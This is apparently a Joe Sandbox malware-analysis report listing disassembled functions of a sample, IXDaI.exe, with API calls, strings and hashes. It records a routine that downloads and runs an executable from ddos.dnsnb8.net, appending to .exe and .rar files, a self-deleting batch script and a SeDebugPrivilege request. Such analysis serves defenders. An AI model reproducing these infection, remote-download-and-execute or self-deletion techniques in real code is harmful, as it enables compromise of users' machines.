Function 00EE29E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00EE2A02
wsprintfA.USER32 ref: 00EE2A1A
memset.MSVCRT ref: 00EE2A44
lstrlen.KERNEL32(?), ref: 00EE2A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00EE2A6C
strrchr.MSVCRT ref: 00EE2A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00EE2A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00EE2AAE
memset.MSVCRT ref: 00EE2AC6
memset.MSVCRT ref: 00EE2ADA
FindFirstFileA.KERNELBASE(?,?), ref: 00EE2AEF
memset.MSVCRT ref: 00EE2B13
lstrcmpiA.KERNEL32(?,?), ref: 00EE2B42
FindNextFileA.KERNELBASE(00000000,?,?,?,?), ref: 00EE2B67
FindClose.KERNELBASE(00000000), ref: 00EE2B6E

Strings

Documents and Settings, xrefs: 00EE2A8D, 00EE2A92, 00EE2A9A, 00EE2AAD
%s*, xrefs: 00EE2A14
C:\, xrefs: 00EE2A2F

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 600af9a7cb924d11f71c67062355d3d4fba2dbc640e8f7a185131b9ee0216a51
Instruction ID: bef28f145a561a5bce737892cc7476dddce0e3f27acaa1d43e6f94bf1a19b438
Opcode Fuzzy Hash: 600af9a7cb924d11f71c67062355d3d4fba2dbc640e8f7a185131b9ee0216a51
Instruction Fuzzy Hash: 5C4133B280438DAFD720DFA1DC89DEBB7ECEB84315F04092DF644E7151E6359A4887A1

Function 00EE6076 Relevance: 14.6, APIs: 7, Strings: 1, Instructions: 616
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00001800,00001000,00000004), ref: 00EE60BE
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 00EE60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00EE6189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00EE61A5

Strings

kernel32.dll, xrefs: 00EE64A7

Memory Dump Source

Source File: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: Virtual$AllocFree
String ID: kernel32.dll
API String ID: 2087232378-1793498882
Opcode ID: 6ba047a1a3f11f3cc178101d1b1eba4fa68128cc721f26e82bfa4c210a5c4c8f
Instruction ID: ccfa69a9712d4d0adda61d275d6cf763c284bba8c2422125aca65bb48a53a9dd
Opcode Fuzzy Hash: 6ba047a1a3f11f3cc178101d1b1eba4fa68128cc721f26e82bfa4c210a5c4c8f
Instruction Fuzzy Hash: 791256726087C98FDB328F25CC45BEA3BB0EF26354F18159DD989AB2A3D374A904C751

Function 00EE1718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00EE1729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00EE174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00EE177C
__aulldiv.LIBCMT ref: 00EE1796
__aulldiv.LIBCMT ref: 00EE17A8

Strings

Time, xrefs: 00EE173D, 00EE1766
SOFTWARE\GTplus, xrefs: 00EE1742, 00EE176B
C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00EE1722

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-4280275245
Opcode ID: cdaf66461c97888a21515402173682d18ff39704e7749c9229ac0fb9353ffb25
Instruction ID: b581d372a2dae4134cd3692f387735b736586778a6ce5145a44a66fd0a4565c8
Opcode Fuzzy Hash: cdaf66461c97888a21515402173682d18ff39704e7749c9229ac0fb9353ffb25
Instruction Fuzzy Hash: 6A116675A0024DBBDB109AA6CCC9FEF7BBCEB45B14F109155FA10B7140D6719A848B60

Function 00EE1E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNELBASE(?,00000080,?,00EE32B0,00000164,00EE2986,?), ref: 00EE1EB9
CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00EE1ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00EE1EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00EE1F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00EE1F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00EE201E
memset.MSVCRT ref: 00EE20D8
memset.MSVCRT ref: 00EE20EA
memcpy.MSVCRT ref: 00EE222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00EE2238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00EE224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00EE22C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00EE22CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00EE22DD
WriteFile.KERNEL32(000000FF,00EE4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00EE22F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00EE230D
CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00EE2322
UnmapViewOfFile.KERNEL32(?,?,00EE32B0,00000164,00EE2986,?), ref: 00EE2340
CloseHandle.KERNEL32(?,?,00EE32B0,00000164,00EE2986,?), ref: 00EE234E
CloseHandle.KERNEL32(000000FF,?,00EE32B0,00000164,00EE2986,?), ref: 00EE2359

Strings

5@, xrefs: 00EE2282
C@, xrefs: 00EE229E
.@, xrefs: 00EE2274
m@, xrefs: 00EE1E8F, 00EE225A
<@, xrefs: 00EE2290

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
String ID: .@$5@$<@$C@$m@
API String ID: 3043204753-519767493
Opcode ID: f41b20e73a74f48247d611c7a9baf3bccbfa38796bf7cd749df3073fa27cc4b0
Instruction ID: d677f980dfb92ca00f6af0ec2e283e7796252444ad87096c0763ae36cb9981eb
Opcode Fuzzy Hash: f41b20e73a74f48247d611c7a9baf3bccbfa38796bf7cd749df3073fa27cc4b0
Instruction Fuzzy Hash: F2F14A71900289EFCB24DFA6DC84AADBBB5FF08314F105569E619BB6A1D730AD81CF50

Function 00EE274A Relevance: 29.8, APIs: 9, Strings: 8, Instructions: 83
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00EE2766
memset.MSVCRT ref: 00EE2774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00EE2787
wsprintfA.USER32 ref: 00EE27AB

Part of subcall function 00EE185B: GetSystemTimeAsFileTime.KERNEL32(00EE1F92,00000000,?,00000000,?,?,?,00EE1F92,?,00000000,00000002), ref: 00EE1867
Part of subcall function 00EE185B: srand.MSVCRT ref: 00EE1878
Part of subcall function 00EE185B: rand.MSVCRT ref: 00EE1880
Part of subcall function 00EE185B: srand.MSVCRT ref: 00EE1890
Part of subcall function 00EE185B: rand.MSVCRT ref: 00EE1894

wsprintfA.USER32 ref: 00EE27C6
CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\480c1388.exe,00000000), ref: 00EE27D4
wsprintfA.USER32 ref: 00EE27F4

Part of subcall function 00EE1973: PathFileExistsA.KERNELBASE(\N,00000000,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00EE1992
Part of subcall function 00EE1973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00EE19BA
Part of subcall function 00EE1973: Sleep.KERNEL32(00000064), ref: 00EE19C6
Part of subcall function 00EE1973: wsprintfA.USER32 ref: 00EE19EC
Part of subcall function 00EE1973: CopyFileA.KERNEL32(?,?,00000000), ref: 00EE1A00
Part of subcall function 00EE1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE1A1E
Part of subcall function 00EE1973: GetFileSize.KERNEL32(?,00000000), ref: 00EE1A2C
Part of subcall function 00EE1973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00EE1A46
Part of subcall function 00EE1973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00EE1A65

DeleteFileA.KERNEL32(?,?,00EE4E54,00EE4E58), ref: 00EE281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00EE4E54,00EE4E58), ref: 00EE2832

Strings

C:\Users\user\AppData\Local\Temp\480c1388.exe, xrefs: 00EE27C0, 00EE27C5, 00EE27CC
C:\Windows\system32, xrefs: 00EE27E3
%s%.8x.exe, xrefs: 00EE27BB
%s%s, xrefs: 00EE27A5
c_31892.nls, xrefs: 00EE27DE
%s\%s, xrefs: 00EE27EE
\WinRAR\Rar.exe, xrefs: 00EE2793
C:\Users\user\AppData\Local\Temp\, xrefs: 00EE27B6

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\480c1388.exe$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-3489375098
Opcode ID: 0aa9f27ef53cd5fea6a0c3d778af8a5d3d155bc9c232eebe1e8fe2d619aa571e
Instruction ID: 366ed7e243d1b3336ee77d606bc1258a43492c4fcc206f2662c44022dd8c39d9
Opcode Fuzzy Hash: 0aa9f27ef53cd5fea6a0c3d778af8a5d3d155bc9c232eebe1e8fe2d619aa571e
Instruction Fuzzy Hash: 732141B6D4039C7BDB10EBB69C89EEB73ACEB04744F0015A5B645F3091E6709F488AA0

Function 00EE1973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.KERNELBASE(\N,00000000,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00EE1992
CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00EE19BA
Sleep.KERNEL32(00000064), ref: 00EE19C6
wsprintfA.USER32 ref: 00EE19EC
CopyFileA.KERNEL32(?,?,00000000), ref: 00EE1A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE1A1E
GetFileSize.KERNEL32(?,00000000), ref: 00EE1A2C
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00EE1A46
ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00EE1A65
FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00EE1A90
DeleteFileA.KERNEL32(?), ref: 00EE1AA7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EE1AC1

Strings

\N, xrefs: 00EE1980
C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00EE197C
%s%.8X.data, xrefs: 00EE19E6
C:\Users\user\AppData\Local\Temp\, xrefs: 00EE19DB

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IXDaI.exe$\N
API String ID: 2523042076-3455619898
Opcode ID: c279f5f8bb882326a376666801426f17644e6394e762ac6fab2da16ebd6cd2e4
Instruction ID: df71413dad3f6c68019f0a15c70ffd7fbb5c74a38b362eb43f44b55e7c5692e4
Opcode Fuzzy Hash: c279f5f8bb882326a376666801426f17644e6394e762ac6fab2da16ebd6cd2e4
Instruction Fuzzy Hash: 3D512E7190129DAFCB109FAADCC8ABEBBB9EB04358F1055B9F519B7190D3709E84CB50

Function 00EE28B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00EE28D3
wsprintfA.USER32 ref: 00EE28F7
memset.MSVCRT ref: 00EE2925
wsprintfA.USER32 ref: 00EE2940

Part of subcall function 00EE29E2: memset.MSVCRT ref: 00EE2A02
Part of subcall function 00EE29E2: wsprintfA.USER32 ref: 00EE2A1A
Part of subcall function 00EE29E2: memset.MSVCRT ref: 00EE2A44
Part of subcall function 00EE29E2: lstrlen.KERNEL32(?), ref: 00EE2A54
Part of subcall function 00EE29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00EE2A6C
Part of subcall function 00EE29E2: strrchr.MSVCRT ref: 00EE2A7C
Part of subcall function 00EE29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00EE2A9F
Part of subcall function 00EE29E2: lstrlen.KERNEL32(Documents and Settings), ref: 00EE2AAE
Part of subcall function 00EE29E2: memset.MSVCRT ref: 00EE2AC6
Part of subcall function 00EE29E2: memset.MSVCRT ref: 00EE2ADA
Part of subcall function 00EE29E2: FindFirstFileA.KERNELBASE(?,?), ref: 00EE2AEF
Part of subcall function 00EE29E2: memset.MSVCRT ref: 00EE2B13

strrchr.MSVCRT ref: 00EE2959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00EE2974

Strings

rar, xrefs: 00EE2988
%s%s, xrefs: 00EE28F1
exe, xrefs: 00EE296D
%s\, xrefs: 00EE293A
C:\Users\user\AppData\Local\Temp\, xrefs: 00EE29B3

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-1101464738
Opcode ID: 178b37a0aca69ca68255d0f84baddf72b6c1d4e5c251ab3369de110fd7ef5a7c
Instruction ID: f77ff710bb1df82f544d6aab4b34620abd8a5510bef4aad0b9cf377713ee0369
Opcode Fuzzy Hash: 178b37a0aca69ca68255d0f84baddf72b6c1d4e5c251ab3369de110fd7ef5a7c
Instruction Fuzzy Hash: 2C31077190038C6BDB209FB7DC89FDA33AC9B54314F04245AF685B7082E7B59AC48B60

Function 00EE1099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EE185B: GetSystemTimeAsFileTime.KERNEL32(00EE1F92,00000000,?,00000000,?,?,?,00EE1F92,?,00000000,00000002), ref: 00EE1867
Part of subcall function 00EE185B: srand.MSVCRT ref: 00EE1878
Part of subcall function 00EE185B: rand.MSVCRT ref: 00EE1880
Part of subcall function 00EE185B: srand.MSVCRT ref: 00EE1890
Part of subcall function 00EE185B: rand.MSVCRT ref: 00EE1894

WinExec.KERNEL32(?,00000005), ref: 00EE10F1
lstrlen.KERNEL32(00EE4748), ref: 00EE10FA
wsprintfA.USER32 ref: 00EE112A
wsprintfA.USER32 ref: 00EE1143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00EE115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00EE1169
Sleep.KERNEL32 ref: 00EE1179

Strings

HG, xrefs: 00EE112C
http://%s:%d/%s/%s, xrefs: 00EE10C2, 00EE1141
ddos.dnsnb8.net, xrefs: 00EE10C8, 00EE10CF, 00EE1140, 00EE1168
cj/, xrefs: 00EE1135
C:\Users\user\AppData\Local\Temp\, xrefs: 00EE1119
%s%.8X.exe, xrefs: 00EE1124

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-888028667
Opcode ID: 49c9de2e7478d2915d89998fc3d2f17336b8f378d85020cdbefea466796cef15
Instruction ID: 945a5de1533690739d1a43bf8748ca5c8fb7a989705f8fc36540a3f5fa6123a9
Opcode Fuzzy Hash: 49c9de2e7478d2915d89998fc3d2f17336b8f378d85020cdbefea466796cef15
Instruction Fuzzy Hash: 23219FB19012CDBECB20DBA2DC89BAEBBBDAB05315F111099F100B7091D7745F888F60

Function 00EE1581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EE185B: GetSystemTimeAsFileTime.KERNEL32(00EE1F92,00000000,?,00000000,?,?,?,00EE1F92,?,00000000,00000002), ref: 00EE1867
Part of subcall function 00EE185B: srand.MSVCRT ref: 00EE1878
Part of subcall function 00EE185B: rand.MSVCRT ref: 00EE1880
Part of subcall function 00EE185B: srand.MSVCRT ref: 00EE1890
Part of subcall function 00EE185B: rand.MSVCRT ref: 00EE1894

wsprintfA.USER32 ref: 00EE15AA
wsprintfA.USER32 ref: 00EE15C6
lstrlen.KERNEL32(?), ref: 00EE15D2
CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00EE15EE
WriteFile.KERNELBASE(00000000,?,00000000,00000001,00000000), ref: 00EE1609
CloseHandle.KERNEL32(00000000), ref: 00EE1612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00EE162D

Strings

open, xrefs: 00EE1627
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 00EE15C0
C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00EE158A, 00EE15B3, 00EE15B8, 00EE15B9
C:\Users\user\AppData\Local\Temp\, xrefs: 00EE1599
%s%.8x.bat, xrefs: 00EE15A4

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IXDaI.exe$open
API String ID: 617340118-460878772
Opcode ID: 074d77e13d93873c0660ec5e236f08dc99272f7641ec256c6f52fd5eef210db8
Instruction ID: 2cd1aba8eb2bac4f002e57383124c72284772a3481f9eb7c98177706a08de49b
Opcode Fuzzy Hash: 074d77e13d93873c0660ec5e236f08dc99272f7641ec256c6f52fd5eef210db8
Instruction Fuzzy Hash: A911427690226C7ED72097A69C8DDEB7B6CDF59750F000091F549F3041EA709F888AA0

Function 00EE1638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00EE164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00EE165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXDaI.exe,00000104), ref: 00EE166E
CreateThread.KERNELBASE(00000000,00000000,00EE1099,00000000,00000000,00000000), ref: 00EE16AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00EE16BD

Part of subcall function 00EE139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00EE13BC
Part of subcall function 00EE139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00EE13DA
Part of subcall function 00EE139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00EE1448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00EE16E5

Strings

Documents and Settings, xrefs: 00EE1696
C:\Windows\system32, xrefs: 00EE1656
C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00EE1662, 00EE1667, 00EE16DD
C:\Users\user\AppData\Local\Temp\, xrefs: 00EE1644

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IXDaI.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-236263198
Opcode ID: 3d83842a69ca28cbac6eaa0a0e6d24f34b9c654a0f55af7cd40b77c0cb78d93d
Instruction ID: d4efaf506c673a449502ac43c6f7af10309acdb47ffd60c8f6baa2cd22685b29
Opcode Fuzzy Hash: 3d83842a69ca28cbac6eaa0a0e6d24f34b9c654a0f55af7cd40b77c0cb78d93d
Instruction Fuzzy Hash: 5A11B9715012DC7FCB2167B7AD8DEDB3E6DEB86765F001095F209BA0E0D6718688C7A1

Function 00EE1000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG,http://%s:%d/%s/%s,00EE10E8,?), ref: 00EE1018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,77068400), ref: 00EE1029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00EE1038
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000), ref: 00EE104B
UnmapViewOfFile.KERNEL32(00000000), ref: 00EE1075
CloseHandle.KERNEL32(?), ref: 00EE108B
CloseHandle.KERNEL32(00000000), ref: 00EE108E

Strings

HG, xrefs: 00EE1001
http://%s:%d/%s/%s, xrefs: 00EE1000
ddos.dnsnb8.net, xrefs: 00EE1026

Memory Dump Source

Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
